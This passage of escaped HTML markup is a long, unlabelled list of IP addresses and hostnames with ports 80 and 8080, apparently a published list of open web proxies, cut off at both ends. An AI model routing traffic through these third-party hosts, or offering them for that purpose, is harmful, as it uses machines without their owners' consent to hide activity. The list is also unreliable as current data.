/&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.179:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.17.134.198:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.175.182.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.13.252.133:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.166:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.15.186.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.102.0.66:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.99.227.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;pc-85-202-96-162.siedlce.domtel.com.pl:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.157.13.111:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;sv.repetto.jp:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.240.40.62:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.235.21.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.129.42:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.185.127.46:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.202.137.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.250.163.103:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.193.37.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.106.250.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.241.250.1:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.240.134.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;100.150.251.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.26.11.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.249.11.119:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.34.41.65:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;112.148.17.220:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.137.98.89:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;111.68.99.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.162.145.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;134.157.250.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.164.204.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.138.47.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.12.41.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.235.86.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.203.247.128:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.175.37.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;105.90.196.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.110.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.113.5.21:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.62.128.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.116.126.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.80.183.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.233.17.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.233.17.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.20.88.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.20.102.221:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.123.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.121.179:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.119.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.139.211.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.119.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.115.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.235.27.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.7.178.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.187.51.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;34.141.7.236:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.110.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.241.31.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.62.21.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.31.157.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.167.225.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.101.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.102.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.60.136.21:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.15.203.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.92.201.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.229.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.201.20.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.96.61.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.218.98.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.254.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.251.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.54.64.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.241.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.247.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.231.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.30.227.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.231.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.180.60.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.230.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.226.141:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.84.140.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.224.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.231.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.207.97.78:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.203.95.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;100.9.243.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.202.0.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.202.99.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.170.249.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.23.35.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.175.91.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.134.255.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.99.218.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.23.35.221:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.3.82.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.229.194.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;4.3.78.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.61.188.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.58.201.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.39.67.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.114.12.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.147.92.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.206.30.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.226.158.190:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.253.126.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.205.130.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.167.95.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;105.41.114.40:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.137.25.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.153.139.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.7.189:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.56.139.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.103.36.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.70.242.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.97.234.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.28.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.140.50.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.113.58.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.7.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.137.123.231:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;146.82.205.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.86.197.27:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.30.95.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.82.55.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.26.92.63:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.30.178.141:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.129.154.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.27.49.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.25.1.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.14.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.13.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.204.153.45:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.244.8.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.148.233.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.14.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.128.177.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.72.7.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.75.37.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;145.7.224.166:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.253.129.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.169.35.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;104.238.50.199:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.63.83.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.62.114.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.251.153.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.33.199.144:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.29.116.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;117.74.97.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.93.112.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.63.145.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;33.131.93.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.14.226.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.102.188.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.7.254.156:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.62.250.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.52.220.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;104.155.251.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.45.221.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.29.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.229.193.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.19.4.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.26.165.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.156.34.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;116.58.171.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.107.184.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.33.141.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;104.55.210.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;162.156.255.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;103.98.133.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.175.61.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.164.77.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.174.68.27:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.168.220.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;116.12.50.48:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.19.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.13.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;42.19.18.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.56.197.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.208.205.215:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.211.186.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.44.114.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;100.43.2.81:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;115.124.68.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.158.125.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;157.25.47.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.253.117:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.232.224:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;115.124.139.118:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;108.183.21.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.111.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.21.5.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.138.113.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.14.227.15:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.130.24.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.12.96.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.149.141.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.219.222.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.150.153.156:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.137.194.122:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.199.84.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.70.40.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;100.202.252.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.231:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.175.37.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.204.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.175.37.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.164.114.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.163.188.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.163.54.171:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.163.248.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.214:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.21.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.37.141.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.223.155.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.222.208.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.203.95.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.130.28.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.232.75.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.116.85.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.131.49.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.99.37.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.36.149.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.7.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.7.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.27.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.26.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.24.224:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.25.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.21.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.20.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.138.161.181:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.139.251.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;37.151.186.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;37.66.185.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;36.235.27.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;36.46.61.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;36.202.181.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;35.123.138.48:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;35.11.202.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;33.183.130.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;35.10.140.49:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;246.33.174.83.rev.vodafone.pt:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;33.131.59.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.91.237.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.177:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.150.108.115:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.130.185.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.77.14.55:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.73.69.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.77.14.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.141:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.152:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.137:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.133:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.190:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.188:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 